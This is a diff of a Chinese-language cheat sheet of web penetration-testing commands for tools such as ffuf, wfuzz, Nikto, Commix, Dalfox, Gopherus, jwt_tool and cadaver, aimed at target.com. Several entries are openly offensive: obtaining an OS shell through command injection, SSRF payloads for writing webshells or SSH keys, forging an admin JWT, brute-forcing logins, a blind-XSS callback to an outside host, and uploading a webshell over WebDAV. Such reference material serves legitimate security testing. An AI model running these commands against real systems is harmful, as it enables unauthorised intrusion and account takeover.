|
208
|
+
_platform: linux_
|
|
209
|
+
```
|
|
210
|
+
ffuf -u http://target.com -H "Host: FUZZ.target.com" -w wordlist.txt
|
|
211
|
+
```
|
|
212
|
+
|
|
213
|
+
**Step 0**
|
|
214
|
+
> 匹配特定状态码
|
|
215
|
+
_platform: linux_
|
|
216
|
+
```
|
|
217
|
+
ffuf -u http://target.com/FUZZ -w wordlist.txt -mc 200,301,302
|
|
218
|
+
```
|
|
219
|
+
|
|
220
|
+
**Step 0**
|
|
221
|
+
> 过滤特定响应大小
|
|
222
|
+
_platform: linux_
|
|
223
|
+
```
|
|
224
|
+
ffuf -u http://target.com/FUZZ -w wordlist.txt -fs 1234
|
|
225
|
+
```
|
|
226
|
+
|
|
227
|
+
**Step 0**
|
|
228
|
+
> 递归目录扫描
|
|
229
|
+
_platform: linux_
|
|
230
|
+
```
|
|
231
|
+
ffuf -u http://target.com/FUZZ -w wordlist.txt -recursion -recursion-depth 2
|
|
232
|
+
```
|
|
233
|
+
|
|
234
|
+
---
|
|
235
|
+
|
|
236
|
+
### WFuzz `wfuzz-tool`
|
|
237
|
+
_Web模糊测试工具_
|
|
238
|
+
|
|
239
|
+
**Step 0**
|
|
240
|
+
> 基础目录爆破
|
|
241
|
+
_platform: linux_
|
|
242
|
+
```
|
|
243
|
+
wfuzz -c -w wordlist.txt http://target.com/FUZZ
|
|
244
|
+
```
|
|
245
|
+
|
|
246
|
+
**Step 0**
|
|
247
|
+
> 过滤404响应
|
|
248
|
+
_platform: linux_
|
|
249
|
+
```
|
|
250
|
+
wfuzz -c -w wordlist.txt --hc 404 http://target.com/FUZZ
|
|
251
|
+
```
|
|
252
|
+
|
|
253
|
+
**Step 0**
|
|
254
|
+
> POST数据测试
|
|
255
|
+
_platform: linux_
|
|
256
|
+
```
|
|
257
|
+
wfuzz -c -w wordlist.txt -d "user=FUZZ&pass=test" http://target.com/login
|
|
258
|
+
```
|
|
259
|
+
|
|
260
|
+
**Step 0**
|
|
261
|
+
> Cookie模糊测试
|
|
262
|
+
_platform: linux_
|
|
263
|
+
```
|
|
264
|
+
wfuzz -c -w wordlist.txt -b "session=FUZZ" http://target.com/
|
|
265
|
+
```
|
|
266
|
+
|
|
267
|
+
**Step 0**
|
|
268
|
+
> Host头测试
|
|
269
|
+
_platform: linux_
|
|
270
|
+
```
|
|
271
|
+
wfuzz -c -w wordlist.txt -H "Host: FUZZ.target.com" http://target.com/
|
|
272
|
+
```
|
|
273
|
+
|
|
274
|
+
**Step 0**
|
|
275
|
+
> 递归扫描
|
|
276
|
+
_platform: linux_
|
|
277
|
+
```
|
|
278
|
+
wfuzz -c -w wordlist.txt -R 2 http://target.com/FUZZ
|
|
279
|
+
```
|
|
280
|
+
|
|
281
|
+
---
|
|
282
|
+
|
|
283
|
+
### Nikto `nikto`
|
|
284
|
+
_Web服务器漏洞扫描器,检测危险文件、过时组件和配置问题_
|
|
285
|
+
|
|
286
|
+
**Step 0**
|
|
287
|
+
> 对目标进行全面Web漏洞扫描
|
|
288
|
+
```
|
|
289
|
+
nikto -h https://target.com
|
|
290
|
+
```
|
|
291
|
+
**语法解析:**
|
|
292
|
+
- `nikto` — Web服务器漏洞扫描器 _command_
|
|
293
|
+
- `-h` — 目标主机 _parameter_
|
|
294
|
+
|
|
295
|
+
**Step 0**
|
|
296
|
+
> 扫描HTTPS服务
|
|
297
|
+
```
|
|
298
|
+
nikto -h target.com -p 8443 -ssl
|
|
299
|
+
```
|
|
300
|
+
|
|
301
|
+
**Step 0**
|
|
302
|
+
> 通过Burp代理进行扫描
|
|
303
|
+
```
|
|
304
|
+
nikto -h target.com -useproxy http://127.0.0.1:8080
|
|
305
|
+
```
|
|
306
|
+
|
|
307
|
+
**Step 0**
|
|
308
|
+
> 仅运行指定的测试插件
|
|
309
|
+
```
|
|
310
|
+
nikto -h target.com -Plugins "apache_expect_xss;outdated"
|
|
311
|
+
```
|
|
312
|
+
|
|
313
|
+
**Step 0**
|
|
314
|
+
> 输出HTML格式报告
|
|
315
|
+
```
|
|
316
|
+
nikto -h target.com -o report.html -Format htm
|
|
317
|
+
```
|
|
318
|
+
|
|
319
|
+
---
|
|
320
|
+
|
|
321
|
+
### OWASP ZAP `zap`
|
|
322
|
+
_OWASP官方Web应用安全测试平台_
|
|
323
|
+
|
|
324
|
+
**Step 0**
|
|
325
|
+
> 快速自动化漏洞扫描
|
|
326
|
+
```
|
|
327
|
+
zap-cli quick-scan -s all -r https://target.com
|
|
328
|
+
# 或使用API
|
|
329
|
+
curl "http://localhost:8080/JSON/ascan/action/scan/?url=https://target.com"
|
|
330
|
+
```
|
|
331
|
+
|
|
332
|
+
**Step 0**
|
|
333
|
+
> 根据OpenAPI规范扫描API
|
|
334
|
+
```
|
|
335
|
+
zap-api-scan.py -t https://target.com/api/swagger.json -f openapi
|
|
336
|
+
```
|
|
337
|
+
|
|
338
|
+
**Step 0**
|
|
339
|
+
> 代理模式被动扫描
|
|
340
|
+
```
|
|
341
|
+
# 配置ZAP为代理(默认8080端口)
|
|
342
|
+
# 浏览器配置代理后正常浏览
|
|
343
|
+
# ZAP自动进行被动漏洞检测
|
|
344
|
+
```
|
|
345
|
+
|
|
346
|
+
**Step 0**
|
|
347
|
+
> 使用Docker容器化运行基线扫描
|
|
348
|
+
```
|
|
349
|
+
docker run -t ghcr.io/zaproxy/zaproxy zap-baseline.py -t https://target.com -r report.html
|
|
350
|
+
```
|
|
351
|
+
|
|
352
|
+
---
|
|
353
|
+
|
|
354
|
+
### Arjun `arjun`
|
|
355
|
+
_HTTP参数发现工具,发现隐藏的GET/POST参数_
|
|
356
|
+
|
|
357
|
+
**Step 0**
|
|
358
|
+
> 发现隐藏的GET参数
|
|
359
|
+
```
|
|
360
|
+
arjun -u https://target.com/page
|
|
361
|
+
```
|
|
362
|
+
**语法解析:**
|
|
363
|
+
- `arjun` — HTTP参数发现工具 _command_
|
|
364
|
+
- `-u` — 目标URL _parameter_
|
|
365
|
+
|
|
366
|
+
**Step 0**
|
|
367
|
+
> 发现POST请求的隐藏参数
|
|
368
|
+
```
|
|
369
|
+
arjun -u https://target.com/api -m POST --include="Content-Type: application/json"
|
|
370
|
+
```
|
|
371
|
+
|
|
372
|
+
**Step 0**
|
|
373
|
+
> 使用自定义参数字典
|
|
374
|
+
```
|
|
375
|
+
arjun -u https://target.com -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
|
|
376
|
+
```
|
|
377
|
+
|
|
378
|
+
**Step 0**
|
|
379
|
+
> 批量扫描多个URL,稳定模式
|
|
380
|
+
```
|
|
381
|
+
arjun -i urls.txt -o results.json --stable
|
|
382
|
+
```
|
|
383
|
+
|
|
384
|
+
---
|
|
385
|
+
|
|
386
|
+
### WFuzz `wfuzz`
|
|
387
|
+
_Web应用模糊测试工具,用于暴力破解参数、目录、认证等_
|
|
388
|
+
|
|
389
|
+
**Step 0**
|
|
390
|
+
> 目录暴力破解,隐藏404
|
|
391
|
+
```
|
|
392
|
+
wfuzz -c -z file,/usr/share/wordlists/dirb/big.txt --hc 404 https://target.com/FUZZ
|
|
393
|
+
```
|
|
394
|
+
**语法解析:**
|
|
395
|
+
- `-c` — 彩色输出 _parameter_
|
|
396
|
+
- `-z file,wordlist` — 指定字典文件作为payload _parameter_
|
|
397
|
+
- `--hc 404` — 隐藏404响应 _parameter_
|
|
398
|
+
- `FUZZ` — Payload注入点占位符 _variable_
|
|
399
|
+
|
|
400
|
+
**Step 0**
|
|
401
|
+
> 参数名Fuzz,隐藏空响应
|
|
402
|
+
```
|
|
403
|
+
wfuzz -c -z file,params.txt --hh 0 "https://target.com/api?FUZZ=test"
|
|
404
|
+
```
|
|
405
|
+
|
|
406
|
+
**Step 0**
|
|
407
|
+
> 双字典组合爆破登录
|
|
408
|
+
```
|
|
409
|
+
wfuzz -c -z file,users.txt -z file,passwords.txt --hc 403 -d "user=FUZZ&pass=FUZ2Z" https://target.com/login
|
|
410
|
+
```
|
|
411
|
+
|
|
412
|
+
**Step 0**
|
|
413
|
+
> Host头注入方式枚举子域名
|
|
414
|
+
```
|
|
415
|
+
wfuzz -c -z file,subs.txt --hc 404 -H "Host: FUZZ.target.com" https://target.com
|
|
416
|
+
```
|
|
417
|
+
|
|
418
|
+
---
|
|
419
|
+
|
|
420
|
+
### Commix `commix`
|
|
421
|
+
_自动化命令注入漏洞检测和利用工具_
|
|
422
|
+
|
|
423
|
+
**Step 0**
|
|
424
|
+
> 自动检测命令注入点
|
|
425
|
+
```
|
|
426
|
+
commix --url="https://target.com/page?cmd=test"
|
|
427
|
+
```
|
|
428
|
+
**语法解析:**
|
|
429
|
+
- `commix` — 命令注入自动化工具 _command_
|
|
430
|
+
- `--url` — 目标URL(参数中含注入点) _parameter_
|
|
431
|
+
|
|
432
|
+
**Step 0**
|
|
433
|
+
> 指定POST参数进行注入测试
|
|
434
|
+
```
|
|
435
|
+
commix --url="https://target.com/api" --data="host=INJECT_HERE" -p host
|
|
436
|
+
```
|
|
437
|
+
|
|
438
|
+
**Step 0**
|
|
439
|
+
> 执行系统命令或获取交互式Shell
|
|
440
|
+
```
|
|
441
|
+
commix --url="https://target.com/page?ip=test" --os-cmd="id"
|
|
442
|
+
commix --url="https://target.com/page?ip=test" --os-shell
|
|
443
|
+
```
|
|
444
|
+
|
|
445
|
+
**Step 0**
|
|
446
|
+
> 使用编码绕过和时间盲注技术
|
|
447
|
+
```
|
|
448
|
+
commix --url="https://target.com/page?cmd=test" --tamper=base64encode --technique=t
|
|
449
|
+
```
|
|
450
|
+
|
|
451
|
+
---
|
|
452
|
+
|
|
453
|
+
### Dalfox `dalfox`
|
|
454
|
+
_基于Go的高性能XSS漏洞扫描和参数分析工具_
|
|
455
|
+
|
|
456
|
+
**Step 0**
|
|
457
|
+
> 扫描单个URL的XSS漏洞
|
|
458
|
+
```
|
|
459
|
+
dalfox url "https://target.com/search?q=test"
|
|
460
|
+
```
|
|
461
|
+
**语法解析:**
|
|
462
|
+
- `dalfox` — XSS漏洞扫描工具 _command_
|
|
463
|
+
- `url` — 单URL扫描模式 _parameter_
|
|
464
|
+
|
|
465
|
+
**Step 0**
|
|
466
|
+
> 批量扫描,仅输出POC
|
|
467
|
+
```
|
|
468
|
+
cat urls.txt | dalfox pipe --silence --only-poc
|
|
469
|
+
```
|
|
470
|
+
|
|
471
|
+
**Step 0**
|
|
472
|
+
> 使用自定义Payload并启用WAF绕过
|
|
473
|
+
```
|
|
474
|
+
dalfox url "https://target.com/q=test" --custom-payload payloads.txt --waf-evasion
|
|
475
|
+
```
|
|
476
|
+
|
|
477
|
+
**Step 0**
|
|
478
|
+
> 使用Blind XSS回调检测
|
|
479
|
+
```
|
|
480
|
+
dalfox url "https://target.com/q=test" --blind https://your-xss-hunter.com
|
|
481
|
+
```
|
|
482
|
+
|
|
483
|
+
---
|
|
484
|
+
|
|
485
|
+
### XSStrike `xsstrike`
|
|
486
|
+
_高级XSS检测工具,支持反射/存储/DOM型XSS检测_
|
|
487
|
+
|
|
488
|
+
**Step 0**
|
|
489
|
+
> 扫描反射型XSS
|
|
490
|
+
```
|
|
491
|
+
python3 xsstrike.py -u "https://target.com/search?q=test"
|
|
492
|
+
```
|
|
493
|
+
|
|
494
|
+
**Step 0**
|
|
495
|
+
> 测试POST参数的XSS
|
|
496
|
+
```
|
|
497
|
+
python3 xsstrike.py -u "https://target.com/comment" --data "content=test" --method POST
|
|
498
|
+
```
|
|
499
|
+
|
|
500
|
+
**Step 0**
|
|
501
|
+
> 使用模糊测试模式发现过滤规则
|
|
502
|
+
```
|
|
503
|
+
python3 xsstrike.py -u "https://target.com/q=test" --fuzzer
|
|
504
|
+
```
|
|
505
|
+
|
|
506
|
+
**Step 0**
|
|
507
|
+
> 爬取3层深度的所有页面并测试XSS
|
|
508
|
+
```
|
|
509
|
+
python3 xsstrike.py -u "https://target.com" --crawl -l 3
|
|
510
|
+
```
|
|
511
|
+
|
|
512
|
+
---
|
|
513
|
+
|
|
514
|
+
### Gopherus `gopherus`
|
|
515
|
+
_生成Gopher协议Payload,用于SSRF攻击内部服务_
|
|
516
|
+
|
|
517
|
+
**Step 0**
|
|
518
|
+
> 生成攻击MySQL的Gopher Payload
|
|
519
|
+
```
|
|
520
|
+
python2 gopherus.py --exploit mysql
|
|
521
|
+
# 输入SQL查询语句后生成gopher://payload
|
|
522
|
+
```
|
|
523
|
+
**语法解析:**
|
|
524
|
+
- `--exploit mysql` — 指定目标服务类型 _parameter_
|
|
525
|
+
|
|
526
|
+
**Step 0**
|
|
527
|
+
> 生成攻击Redis的Gopher Payload
|
|
528
|
+
```
|
|
529
|
+
python2 gopherus.py --exploit redis
|
|
530
|
+
# 可生成写入webshell/计划任务/SSH密钥等payload
|
|
531
|
+
```
|
|
532
|
+
|
|
533
|
+
**Step 0**
|
|
534
|
+
> 生成攻击PHP-FPM/FastCGI的Payload
|
|
535
|
+
```
|
|
536
|
+
python2 gopherus.py --exploit fastcgi
|
|
537
|
+
# 输入要执行的命令
|
|
538
|
+
```
|
|
539
|
+
|
|
540
|
+
**Step 0**
|
|
541
|
+
> 生成通过SMTP发送邮件的Payload
|
|
542
|
+
```
|
|
543
|
+
python2 gopherus.py --exploit smtp
|
|
544
|
+
```
|
|
545
|
+
|
|
546
|
+
---
|
|
547
|
+
|
|
548
|
+
### Smuggler `smuggler`
|
|
549
|
+
_HTTP请求走私漏洞检测工具_
|
|
550
|
+
|
|
551
|
+
**Step 0**
|
|
552
|
+
> 自动检测HTTP请求走私漏洞
|
|
553
|
+
```
|
|
554
|
+
python3 smuggler.py -u https://target.com
|
|
555
|
+
```
|
|
556
|
+
**语法解析:**
|
|
557
|
+
- `smuggler.py` — HTTP走私检测脚本 _command_
|
|
558
|
+
|
|
559
|
+
**Step 0**
|
|
560
|
+
> 测试CL.TE类型的请求走私
|
|
561
|
+
```
|
|
562
|
+
python3 smuggler.py -u https://target.com -t CL.TE
|
|
563
|
+
```
|
|
564
|
+
|
|
565
|
+
**Step 0**
|
|
566
|
+
> 从标准输入读取URL批量测试
|
|
567
|
+
```
|
|
568
|
+
cat urls.txt | python3 smuggler.py
|
|
569
|
+
```
|
|
570
|
+
|
|
571
|
+
---
|
|
572
|
+
|
|
573
|
+
### JWT Tool `jwt-tool`
|
|
574
|
+
_JSON Web Token安全测试工具,支持伪造/破解/注入_
|
|
575
|
+
|
|
576
|
+
**Step 0**
|
|
577
|
+
> 解析并显示JWT的Header和Payload
|
|
578
|
+
```
|
|
579
|
+
jwt_tool eyJhbGciOi...
|
|
580
|
+
```
|
|
581
|
+
**语法解析:**
|
|
582
|
+
- `jwt_tool` — JWT安全测试工具 _command_
|
|
583
|
+
|
|
584
|
+
**Step 0**
|
|
585
|
+
> 自动尝试所有已知JWT攻击
|
|
586
|
+
```
|
|
587
|
+
jwt_tool -t https://target.com/api -rh "Authorization: Bearer eyJ..." -M at
|
|
588
|
+
```
|
|
589
|
+
|
|
590
|
+
**Step 0**
|
|
591
|
+
> 尝试将算法改为none绕过验证
|
|
592
|
+
```
|
|
593
|
+
jwt_tool eyJhbGciOi... -X a
|
|
594
|
+
```
|
|
595
|
+
|
|
596
|
+
**Step 0**
|
|
597
|
+
> 暴力破解HMAC密钥
|
|
598
|
+
```
|
|
599
|
+
jwt_tool eyJhbGciOi... -C -d /usr/share/wordlists/rockyou.txt
|
|
600
|
+
```
|
|
601
|
+
|
|
602
|
+
**Step 0**
|
|
603
|
+
> 使用已知密钥伪造Token,修改角色为admin
|
|
604
|
+
```
|
|
605
|
+
jwt_tool eyJhbGciOi... -S hs256 -p "secret_key" -I -pc role -pv admin
|
|
606
|
+
```
|
|
607
|
+
|
|
608
|
+
---
|
|
609
|
+
|
|
610
|
+
### GraphQLmap `graphqlmap`
|
|
611
|
+
_GraphQL API渗透测试工具,支持自省查询和注入_
|
|
612
|
+
|
|
613
|
+
**Step 0**
|
|
614
|
+
> 通过自省查询导出完整Schema
|
|
615
|
+
```
|
|
616
|
+
python3 graphqlmap.py -u https://target.com/graphql --method POST -x dump_schema
|
|
617
|
+
```
|
|
618
|
+
|
|
619
|
+
**Step 0**
|
|
620
|
+
> 枚举所有可用的Query/Mutation字段
|
|
621
|
+
```
|
|
622
|
+
python3 graphqlmap.py -u https://target.com/graphql --method POST -x enum
|
|
623
|
+
```
|
|
624
|
+
|
|
625
|
+
**Step 0**
|
|
626
|
+
> 测试GraphQL参数的注入漏洞
|
|
627
|
+
```
|
|
628
|
+
python3 graphqlmap.py -u https://target.com/graphql --method POST -x nosqli
|
|
629
|
+
```
|
|
630
|
+
|
|
631
|
+
---
|
|
632
|
+
|
|
633
|
+
### Cadaver `cadaver`
|
|
634
|
+
_WebDAV客户端工具,用于测试WebDAV服务_
|
|
635
|
+
|
|
636
|
+
**Step 0**
|
|
637
|
+
> 连接到WebDAV服务器
|
|
638
|
+
_platform: linux_
|
|
639
|
+
```
|
|
640
|
+
cadaver https://target.com/webdav/
|
|
641
|
+
```
|
|
642
|
+
|
|
643
|
+
**Step 0**
|
|
644
|
+
> 上传Webshell或文件到WebDAV目录
|
|
645
|
+
_platform: linux_
|
|
646
|
+
```
|
|
647
|
+
# 在cadaver交互式Shell中:
|
|
648
|
+
put shell.aspx
|
|
649
|
+
mput *.txt
|
|
650
|
+
```
|
|
651
|
+
|
|
652
|
+
**Step 0**
|
|
653
|
+
> 列出目录内容并下载文件
|
|
654
|
+
_platform: linux_
|
|
655
|
+
```
|
|
656
|
+
# cadaver Shell:
|
|
657
|
+
ls
|
|
658
|
+
get config.xml
|
|
659
|
+
mget *.bak
|
|
660
|
+
```
|
|
661
|
+
|
|
662
|
+
---
|